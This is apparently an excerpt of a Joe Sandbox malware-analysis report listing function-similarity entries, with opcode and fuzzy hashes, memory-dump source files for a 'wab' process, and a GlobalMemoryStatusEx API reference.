                                                                  • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                  • Instruction ID: dc3323509655add47458b7bfdc28b409d7665b879035d0867add309d4545c2bc
                                                                  • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                  • Instruction Fuzzy Hash: 89F06236104518EFC7029BA5DD40D9FBBA8EF06354B2540BAE980F7211D674DF01AB99
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3265885922.0000000002A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2a5d000_wab.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ee12c86b43616e1054de0460f5ccc64c75cfd214e03c6246709f9617a5a48176
                                                                  • Instruction ID: 5288b9af918039f415ae1701df3ed581ebcdc87791dcf24fb5cd881725b8f8fd
                                                                  • Opcode Fuzzy Hash: ee12c86b43616e1054de0460f5ccc64c75cfd214e03c6246709f9617a5a48176
                                                                  • Instruction Fuzzy Hash: 2C21F2B1604604EFDB15DF24D9C4B27BB65FF88314F24C96DEC4A4B246CB3AD846CA62
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3266100788.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2a80000_wab.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 78fd7bffeb03122f1e87635ab6a0111f423ac94ebe43eede2727684cd8c731a7
                                                                  • Instruction ID: 6b6b67b7ac9a05a265b19eb165c3fc7b9a0d19e0c06c5a6650de51ac420b6510
                                                                  • Opcode Fuzzy Hash: 78fd7bffeb03122f1e87635ab6a0111f423ac94ebe43eede2727684cd8c731a7
                                                                  • Instruction Fuzzy Hash: BC4125B2D043599FCB14DFB9D8446AEFBF5EF89310F04856AE404A7241DB38A944CBD0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,02A8EA52), ref: 02A8EB3F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3266100788.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2a80000_wab.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemoryStatus
                                                                  • String ID:
                                                                  • API String ID: 1890195054-0
                                                                  • Opcode ID: 38aad2a3fe8b96b729873c9de0ede632ea199e924719a9a3178e1a0128fd3d5d
                                                                  • Instruction ID: d2480c660f3b1b1b8bddf440365770ec163fefb924db368b813fc7d734dee3e0
                                                                  • Opcode Fuzzy Hash: 38aad2a3fe8b96b729873c9de0ede632ea199e924719a9a3178e1a0128fd3d5d
                                                                  • Instruction Fuzzy Hash: 7E1124B1C106599FCB10CF9AC585BDEFBF4AF48310F14816AE914A7240D778A944CFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,02A8EA52), ref: 02A8EB3F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3266100788.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2a80000_wab.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemoryStatus
                                                                  • String ID:
                                                                  • API String ID: 1890195054-0
                                                                  • Opcode ID: 102a619de16223177caf6c6cca0dff31321240ae8eb691e2f4e8e9646cf87103
                                                                  • Instruction ID: c8480b64d775c00497c67caaa6efe9129f75dbb64fdfbf97760440687bf007b5
                                                                  • Opcode Fuzzy Hash: 102a619de16223177caf6c6cca0dff31321240ae8eb691e2f4e8e9646cf87103
                                                                  • Instruction Fuzzy Hash: E21133B1D00659DBCB10DF9AC544B9EFBF4EF48320F14816AE918B7240D778A944CFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3265885922.0000000002A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2a5d000_wab.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 27f6b27b6731e7cbac2b0739d020570b7be09b0285b219596792685815c0ff7d
                                                                  • Instruction ID: 39de5e67c83b7a1bebbf1dab45d8df7729b26771abd47766bfdccaaab10d15f9
                                                                  • Opcode Fuzzy Hash: 27f6b27b6731e7cbac2b0739d020570b7be09b0285b219596792685815c0ff7d
                                                                  • Instruction Fuzzy Hash: CF2123B1604644EFDB01DF14D9C4B2BFB65FB84324F24CA69EC491B246C77AD806CA62
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3265885922.0000000002A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2a5d000_wab.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ffc3f8b229e3324c71b4dc5ecaf354257dbfbdf382ba32f0d1c102fbbc46c594
                                                                  • Instruction ID: 4c6b6471c8aa86de4ed4378ad450cb30fc88104e131a81a4770f6606cd37a336
                                                                  • Opcode Fuzzy Hash: ffc3f8b229e3324c71b4dc5ecaf354257dbfbdf382ba32f0d1c102fbbc46c594
                                                                  • Instruction Fuzzy Hash: 7F21F5B5504604DFDB09DF14D5C0B27BB75FB84324F24C96DDC094B246C776E846CA61
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3265885922.0000000002A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2a5d000_wab.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1e06d98b3feba62a46d8fc52e8bedceffe53e2ddd6c7fe4d98e50ab0f081ae8e
                                                                  • Instruction ID: 25df1a494121fed71c052b7bc4a9fd72e69683b60dee7213636f71c42c5e8c11
                                                                  • Opcode Fuzzy Hash: 1e06d98b3feba62a46d8fc52e8bedceffe53e2ddd6c7fe4d98e50ab0f081ae8e
                                                                  • Instruction Fuzzy Hash: 2311C176504684CFDB12CF14D5C4B1AFF61FB84324F24C6AADC494B646C37AD40ACBA2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3265885922.0000000002A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2a5d000_wab.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8bd4318166a5511db8e532d5d06596f6694e76da0c7d38603b81d7949cefb112
                                                                  • Instruction ID: 02db69678820a308f908ee7e54617aee9d6bf3a051cddb2e0ca3c27706d44466
                                                                  • Opcode Fuzzy Hash: 8bd4318166a5511db8e532d5d06596f6694e76da0c7d38603b81d7949cefb112
                                                                  • Instruction Fuzzy Hash: B5119D75504680DFDB06CF24D5C4B16BBB2FB85314F24C6AEDC494B656C33AE84ACBA2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3265885922.0000000002A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2a5d000_wab.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8bd4318166a5511db8e532d5d06596f6694e76da0c7d38603b81d7949cefb112
                                                                  • Instruction ID: aa1c75a3ef8eb54291dc69859b0fb8bb422c88a64064b421abe04e804e70d46a
                                                                  • Opcode Fuzzy Hash: 8bd4318166a5511db8e532d5d06596f6694e76da0c7d38603b81d7949cefb112
                                                                  • Instruction Fuzzy Hash: AA11BB75504684CFCB12CF10D9C4B16BBA2FB88314F24C6ADDC494B256C73AD84ACF62
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%